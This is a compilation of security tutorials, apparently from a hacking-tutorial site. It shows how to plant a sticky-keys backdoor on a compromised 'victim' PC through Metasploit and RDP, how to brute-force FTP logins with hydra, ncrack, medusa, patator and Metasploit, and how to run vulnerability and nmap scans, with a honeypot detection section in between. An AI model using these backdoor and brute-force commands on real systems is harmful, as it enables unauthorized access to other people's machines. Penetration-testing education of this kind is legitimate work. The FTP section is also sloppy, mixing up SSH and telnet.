Access Sticky keys Backdoor on Remote PC with Sticky Keys Hunter

This bash script tests for sticky keys and utilman backdoors. The script will connect to an RDP server; send both the sticky keys and utilman triggers and screenshot the result.

How does it work?

·         Connects to RDP using rdesktop

·         Sends shift 5 times using xdotool to trigger sethc.exe backdoors

·         Sends Windows+u using xdotool to trigger utilman.exe backdoors

·         Takes screenshot

·         Kills RDP connection

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Bypass the UAC Protection of Victim PC (Tutorial How to Bypass UAC Protection)

After getting the session enable the remote desktop option of remote pc using following exploit

msf > use post/windows/manage/enable_rdp

msf post(enable_rdp) > set session 2

msf post(enable_rdp) > exploit

In Next step replace the sticke key with command prompt using following exploit

msf > use post/windows/manage/stickey_keys

msf post(stickey_keys) > set session 2

msf post(stickey_keys) > exploit

Now clone Sticky Keys Hunter repository from github, to do so type:

git clone https://github.com/ztgrace/sticky_keys_hunter.git

For scan a single host: ./stickyKeysHunter.sh 192.168.0.120







Now a pop will open like below

Now press shift key 5 times at the login screen now a command prompt will open up

Now you can do anything in victim pc through command prompt. I am using net user command to see the list of active account

Detect Vulnerability Scanner in Network using Kfsensor

In the previous article, we have seen that how KFSensorHoneypot IDS detects any unauthorized person by simulating vulnerable system services. Well, vulnerability to a hacker is like jewels. Every hacker or malicious person  fist face of hacking is Footprinting and second is scanning where they get to know whether a system is vulnerable for performing an attack or not. So in this article, we will detect an unauthorized person or a hacker and stop it.

Install and start KFSensorHoneypot IDS server to do this read my previous article

http://www.hackingarticles.in/detect-hacker-network-using-kfsensor-honeypot

Here my KFSensorHoneypot is ready.

Scanning phase tells us whether systems is vulnerable or not and sometimes even provide us exploit information which is available for that vulnerability. So every of the hacker performs this step before exploiting your system.

 So here I try to scan my system running KFSensor with Nessus vulnerability scanner from another computer.

As you can see Nessus started scanning my system and finding the vulnerability.

Here you can see that KFSensorHoneypot IDS alerted you that someone is trying to scan your system for vulnerability and some of the packets your system is receiving are malicious and recorded attackers IP address.

Now I’m trying to scan my system with GFI Languard also to see that KFSensorIDS detect or not.

GFI Languard started scanning.

Here KFSensorHoneypot IDS alerted that someone is sending packets to get vulnerability of the system. Here you can monitor attacks on every TCP and UDP ports. Even you can see ICMP or ping messages.

Here you can see that someone is trying attacking on Port and his IP address is 192.168.149.1

You can also view alerts by visitor’s means which IP address is trying to access onwhich ports.

KfsensorHoneypot IDS can also detect whether someone is using a Vulnerability scanner or not to perform an attack on your system. Now we know that particular IP address is sending to many packets which are not good. So to block that IP address we have to create a separate policy for that visitor.

To do that double-click on IP address you want to block accessing your system, a menu will appear.

Now click on details.

Here click on Create Visitor Ruleto create a policy.

After that select port, you want to block for that IP address and select actions Close or Ignore all requests from that particular IP address.

Vulnerability Scanning in Network using Retina

Retina is a network vulnerability scanner, one of the industry’s most powerful and effective vulnerability scanners. This network scanning tool gives pretty good vulnerability assessment experience and generates full brief network vulnerability report.

So let’s see how to do network vulnerability scanning.

Open Retina vulnerability scanning. In audit section click on Targets select target type you can select single IP or you can also give a range of IP’s, in my case I’m scanning single IP, now give file name and job name whatever you want.

Now click on Ports in the left section and select types of port group you want to include in your scan and click on modify.

Now click on Audits from the left section and select the type you want to scan.

Now goto Options section and select type of information you want to gather like NetBios name, DNS address, etc.

 Now goto credential section and select your type and finally click on scan.

Now Retina will start scanning your network according to settings.

After few minutes your vulnerability scanning will complete.

Now go to Remediate section, in this section you can select what you want to include in your vulnerability report.

Now in Report section you can select what type of report you want to generate for your network penetration testing. Select the type of report according to your need from Report type menu and click on Generate button

After that you have two options to view your report, either through Internet explorer or Microsoft word.

Click on the internet explorer icon. Now you can see that Retina Network vulnerability scanner created a wonderful vulnerability report by explaining each and every vulnerability of the network.

6 Ways to Hack FTP Login Password

In this article, we will learn how to gain control over our victim's PC through SSH Port. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 hydra –L/root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.103 ftp

-L: denotes path for username list

-P:  denotes path for password list

Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. As you can observe that we had successfully grabbed the telnet username as pavan and password as toor.

xHydra

This is the graphical version to apply dictionary attack via FTP port to hack a system. For this method to work:

Open xHydra in your kali. And select Single Target option and their give the IP of your victim PC. And select FTP in box against Protocol option and give the port number 21 against the port option.

Now, go to Passwords tab and select Username List and give the path of your text file, which contains usernames, in the box adjacent to it.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

Run the following command

ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.1.103:21

Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the telnet username as pavan and password as toor.

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few

Run the following command

Medusa  -h 192.168.1.103 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M ftp

Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the telnet username as pavan and password as toor.

Patator

Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. It is quite useful for making brute force attack on several ports such as FTP, HTTP, SMB and etc.

patator ftp_login host=192.168.1.103 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt 

From given below image you can observe that the process of dictionary attack starts and thus, you will attain the username and password of your victim.

Metasploit

This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Open Kali terminal type msfconsole

 Now type use auxiliary/scanner/ftp/ftp_login

msf exploit (ftp_login)>set rhosts 192.168.1.103 (IP of Remote Host)

msf exploit (ftp_login)>set user_file  /root/Desktop/user.txt

msf exploit (ftp_login)>set userpass_file  /root/Desktop/pass.txt

msf exploit (ftp_login)>set stop_on_success true

msf exploit (ftp_login)> exploit

From given below image you can observe that we had successfully grabbed the FTP username and password.

Network Scanning using NMAP (Beginner Guide)

Basic Scanning Techniques

So here I will show the basic techniques for scanning network/host. But before that, you should know some basic stuff regarding Nmap status after scanning.

Port Status: After scanning, you may see some results with a port status like filtered, open, closed, etc. Let me explain this.

·         Open: This indicates that an application is listening for connections on this port.

·         Closed: This indicates that the probes were received but there is no application listening on this port.

·         Filtered: This indicates that the probes were not received and the state could not be established. It also indicates that the probes are being dropped by some kind of filtering.

·         Unfiltered: This indicates that the probes were received but a state could not be established.

·         Open/Filtered: This indicates that the port was filtered or open but Nmap couldn’t establish the state.

·         Closed/Filtered: This indicates that the port was filtered or closed but Nmap couldn’t establish the state.

Open kali linux terminal and type nmap to serach all nmap commands

Find All Connected PC (Ping Scan)

The -Sp option for a ping only scan. It will be more useful when you have a group of IP addresses and you don’t know which one is reachable.

nmap -sP -T4 192.168.0.1/24

Note:

-T : Used to change speed of scan. Slow scan yields Better results

Multiple IP Scan

nmap -sn 192.168.0.1/24

TCP Ports Scan

TCP connect scan is the default TCP scan type when SYN scan is not an option. It will show you all open TCP ports in Remote PC.

Sinlge IP Scan

nmap -sT 192.168.0.102

Multiple IP Scan

nmap -sT 192.168.0.1/24

Detect Service Version

In this scan you can find the version of the service that is running on each open port. This is done using multiple techniques like banner grabbing, reading server headers and sending specific requests.

Single Host Service Scanning

nmap -sV 192.168.0.102

Multiple Hosts Scanning

nmap -sV -T4 192.168.0.1/24

Detect Operating System

In this scan you can find the Installed Operating System in the Network PC.

Single Host Scanning

nmap -O 192.168.0.102

Multiple Hosts Scanning

nmap -O -T4 192.168.0.1/24

Detect Protocol

In this scan you can find the PROTOCOL, STATE, SERVICE in the Network PC.

nmap -sO -T4 192.168.0.1/24

Aggressive Scan (Also Work for Trace route)

For Single Host

The aggressive scan selects most commonly used options  it is simple alternative to writing long strings. It will also work for traceroute, etc.

nmap -A 192.168.0.102

Multiple Hosts Scanning

nmap -A -T4 192.168.0.1/24

UDP Ping Scan

The UDP scan only on udp ping scans on the target. . It will show you all open UDP ports in Remote PC.

nmap -sU -T4 192.168.0.102

Syn Scan

Complete 2 step in 3 way handshake. No chance of closing or crashing target. Undetected by older System. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls.

nmap –sS 192.168.0.113